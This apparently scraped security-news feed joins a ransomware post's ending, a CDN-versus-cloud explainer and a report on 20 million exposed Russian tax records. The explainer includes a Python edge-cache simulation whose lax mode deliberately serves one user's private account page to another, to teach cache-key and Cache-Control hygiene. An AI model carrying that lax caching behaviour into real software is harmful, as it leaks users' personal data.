Pierluigi Paganini

(SecurityAffairs – hospitals, ransomware)


The post Ten hospitals in Alabama and Australia have been hit with ransomware attacks appeared first on Security Affairs.

Do You Need Cloud Computing and Content Delivery Networks (CDN)?

More than 20 years ago, Bill Gates asserted that “content is king.” He most probably could not have predicted how much content readers would consume on the internet today, nor the challenges of delivering web applications and content to an ever-growing global base of users.

The primary challenges are performance and scalability. If you are facing them, you can take advantage of cloud computing and content delivery networks (CDNs). But do you know the difference between the two, and which of them meets your requirements?

Content Delivery Network (CDN)

In simple words, a content delivery network is a collection of connected servers that distribute content.

How CDN Works

At least one server acts as the “origin” while the others are cache servers located in several countries around the world, geographically close to different groups of end users. The source media or content lives on the origin server, which sends it to the cache servers on an as-needed basis.

When a user requests content, the CDN URL resolves to the cache server nearest to them, so they get the content quickly with reduced latency. Distributing the load across servers in various regions also reduces the strain on the origin server.

Use Cases for Content Delivery Network

This type of delivery network is best suited to static content such as videos, images, and music, though many content providers also use it for streaming media.

For instance, a company can deliver a weekly streaming video to users across the United States through a CDN. In the past it would have used a centralised server to which every user connected, and consumers would have had different experiences depending on factors such as their distance from that server.

Users accessing the stream from distant states may suffer buffering and slow load times because of high latency, and all of them may suffer delivery problems when the central server hits its connection or bandwidth limits.

A CDN delivers the streaming media from local servers, reducing the load on the origin server and keeping latency low.
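The part of a CDN that matters to a security engineer is the cache key and the rules for what may be stored: an edge that caches a personalised page serves one customer's data to the next, and an edge that ignores Vary mixes responses meant for different clients. The following added example (my own code, not from the article or any CDN vendor) models an edge cache in front of a constructed origin, keyed by host, path and the request headers named in the origin's Vary, honouring `Cache-Control` and refusing to store `private`/`no-store` responses. The `strict=False` switch models the misconfiguration, and the hosts, paths and responses are all made up.

```python
import time


def parse_cache_control(value):
    directives = {}
    for part in value.split(","):
        part = part.strip().lower()
        if part:
            name, _, arg = part.partition("=")
            directives[name] = arg
    return directives


def ttl_for(response, strict=True):
    """Seconds a shared cache may keep `response`, or None for do-not-store.
    strict=False models an edge that ignores private/no-store and applies a
    default lifetime, the misconfiguration that leaks one user's page to the next."""
    cc = parse_cache_control(response["headers"].get("Cache-Control", ""))
    if strict and ("no-store" in cc or "private" in cc):
        return None
    for directive in ("s-maxage", "max-age"):
        if cc.get(directive, "").isdigit():
            return int(cc[directive])
    return None if strict else 60


class EdgeCache:
    def __init__(self, origin, strict=True, now=time.monotonic):
        self.origin, self.strict, self.now = origin, strict, now
        self.vary_by = {}     # (host, path) -> header names from the origin's Vary
        self.entries = {}     # ((host, path), vary values) -> (expires_at, response)
        self.origin_fetches = 0

    @staticmethod
    def _secondary(request, vary):
        # Request headers are stored with lower-case names in this example.
        return tuple(request["headers"].get(h, "") for h in vary)

    def get(self, request):
        primary = (request["host"], request["path"])
        vary = self.vary_by.get(primary, ())
        entry = self.entries.get((primary, self._secondary(request, vary)))
        if entry and entry[0] > self.now():
            return dict(entry[1], cache="HIT")
        response = self.origin(request)
        self.origin_fetches += 1
        ttl = ttl_for(response, self.strict)
        vary = tuple(h.strip().lower() for h in response["headers"].get("Vary", "").split(",") if h.strip())
        if ttl is None or "*" in vary:
            return dict(response, cache="BYPASS")
        self.vary_by[primary] = vary
        self.entries[(primary, self._secondary(request, vary))] = (self.now() + ttl, response)
        return dict(response, cache="MISS")


def origin(request):
    """Constructed origin server: one static asset, one personalised page, one localised API."""
    path, headers = request["path"], request["headers"]
    if path == "/static/logo.png":
        return {"status": 200, "headers": {"Cache-Control": "public, max-age=3600"}, "body": "<png bytes>"}
    if path == "/account":
        user = headers.get("cookie", "anonymous")
        return {"status": 200, "headers": {"Cache-Control": "private, no-store"},
                "body": "account page for %s" % user}
    if path == "/api/prices":
        lang = headers.get("accept-language", "en")
        return {"status": 200, "headers": {"Cache-Control": "public, max-age=60", "Vary": "Accept-Language"},
                "body": "prices in %s" % lang}
    return {"status": 404, "headers": {}, "body": "not found"}


def _req(path, **headers):
    return {"host": "www.example.com", "path": path, "headers": headers}


def run_scenario(strict=True):
    edge = EdgeCache(origin, strict=strict)
    logo = [edge.get(_req("/static/logo.png"))["cache"] for _ in range(2)]
    account = [edge.get(_req("/account", cookie="user=alice"))["body"],
               edge.get(_req("/account", cookie="user=bob"))["body"]]
    prices = [edge.get(_req("/api/prices", **{"accept-language": lang}))["cache"]
              for lang in ("en", "de", "en")]
    return {"logo": logo, "account": account, "prices": prices, "origin_fetches": edge.origin_fetches}


if __name__ == "__main__":
    print(run_scenario(strict=True))    # bob gets his own account page
    print(run_scenario(strict=False))   # bob gets alice's cached page
```

The strict run shows the behaviour you want from a real edge: the logo is fetched once, the two account requests both go to the origin, and the price list is stored once per language. The lax run shows why `Cache-Control: private` on personalised responses and a CDN configuration that honours it belong on the same checklist as TLS.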

Cloud Computing

Cloud computing reduces the cost of delivering content and applications by making use of computing resources that would otherwise sit idle.

How Cloud Computing Works

Many computer systems remain ideal even though they serve more users. Through server virtualization, various virtual machines can access the resources of a single computer while delivering content and running applications.

Since the introduction of the cloud, hypervisor technology has advanced considerably and now supports cluster management of hosts running many virtual machines. It manages virtualized servers that share resources so that workloads survive even if a single host malfunctions. Virtual machines and cloud technologies add reliability and resiliency to hosted applications by abstracting their functionality from the physical hardware.

Cloud computing allows virtual machine images to be deployed and shared in different regions. Moreover, it permits applications to be delivered quickly, with lower latency and better performance. In that respect, it acts much like a content delivery network. As the number of users increases, it becomes easier, cheaper, and faster to bring up a new virtual machine than to add new hardware.

Cloud computing has different types and can range from custom-designed private clouds to hyper-scale public clouds. It can come with a high-powered bare-metal configuration. Famous public cloud providers include Azure and AWS.

Use Cases for Cloud Computing

The main functionality of cloud computing is to provide efficient resource management of networks and hosts to reduce delivery costs of content and applications. However, it also permits the simple deployment of server images to a host cluster or an individual computer. It is beneficial in enhancing the user experience through the placement of content or application in different regions. This way, it functions like a CDN in resource distribution.

The deployment of applications can also include disaster recovery strategies either by spinning up planned resources quickly or by relegating to a close standby environment. The technology makes it feasible to replicate an environment in another location across the globe.

For instance, a company can use a cloud-computing environment to reduce its hardware expenditures by sharing resources across various virtual machines, instead of procuring one physical computer per application function. As the number of users per application grows, the organization can add more servers easily by spinning up virtual compute instances from templates for the required functionality.

Combining Cloud Computing and CDN

In summary, a content delivery network offers a delivery platform for large amounts of content by using a server closest to the requisitioning user. On the other hand, cloud computing permits scaling of application resources efficiently.

Cloud computing is popular because it is highly scalable and can process large amounts of data, and in recent years it has become applicable to many different fields. However, both CDN and cloud computing have disadvantages. A CDN has limited storage space and lacks the IT infrastructure to keep up as the number of users grows. Cloud computing, on the other hand, concentrates traffic in a few locations, which can cause network congestion. Combining the two technologies is more beneficial: load balancing and high scalability together make the combination suitable for users with massive data requirements.

Combining the strategies for cloud computing and CDN builds a more reliable and resilient delivery strategy for content and applications than relying on just one of them. Deciding to use both systems can eliminate a singular failure point in application and content delivery through efficient and smart use of resources. CDNs reduce latency, and cloud computing offers more data storage. Each has its strengths and weaknesses, but together, they can combine their powers to be more useful to organizations and end-users.

Moreover, collaborating with a managed service provider that provides both functionalities can simplify relationships and leverage the combined expertise. An organization can take advantage of both CDN and cloud computing to provide fast and reliable content to its users all across the world.

The post Do You Need Cloud Computing and Content Delivery Networks (CDN)? appeared first on .

Experts found 20 Million tax records for Russian citizens exposed online

Experts discovered an unprotected Elasticsearch cluster containing personally identifiable and tax information of Russian citizens exposed online.

Security experts from Comparitech along with security researcher Bob Diachenko discovered 20 million tax records belonging to Russian citizens exposed online in clear text and without protection.

The experts found an unprotected Elasticsearch cluster containing personally identifiable information on Russian citizens spanning from 2009 to 2016.

“A database of more than 20 million Russian tax records was found on an unsecured server, accessible to anyone with a web browser.” reads the post published by Comparitech.

“Comparitech partnered with security researcher Bob Diachenko to investigate the data exposure, which included sensitive personal and tax information. The database was taken offline after Diachenko notified the owner, who is based in Ukraine.”


The Elasticsearch database was first indexed by search engines in May 2018, Diachenko discovered it on September 17, 2019, and on September 20, 2019 it was secured.

It is not possible to determine whether anyone else accessed the exposed data before Diachenko discovered it. The experts also revealed that the owner is based in Ukraine, but did not disclose its identity.

The cluster included multiple databases, two of which contained tax and personally identifiable information about Russian citizens, predominantly from Moscow and the surrounding area.

“The first database contained more than 14 million personal and tax records from 2010 to 2016, and the second included over 6 million from 2009 to 2015.” the experts continue.

Exposed records included the following information:

  • Full name
  • Address
  • Residency status
  • Passport number
  • Phone number
  • Tax ID number
  • Employer name and phone number
  • Tax amount

The exposed data could be used by threat actors to carry out tax scams and fraud.

“Affected individuals could be at risk of identity theft and should monitor their accounts closely. Tax fraud could also be a risk, though our team is not well-versed enough on the topic of the Russian tax system to give concrete advice.” the experts conclude.

“Potential victims should also be on the lookout for targeted phishing and other scams. Fraudsters could pose as tax officials, for example, to steal money or request additional information to aid in identity theft.”

Pierluigi Paganini

(SecurityAffairs – Russian citizens, data leak)

The post Experts found 20 Million tax records for Russian citizens exposed online appeared first on Security Affairs.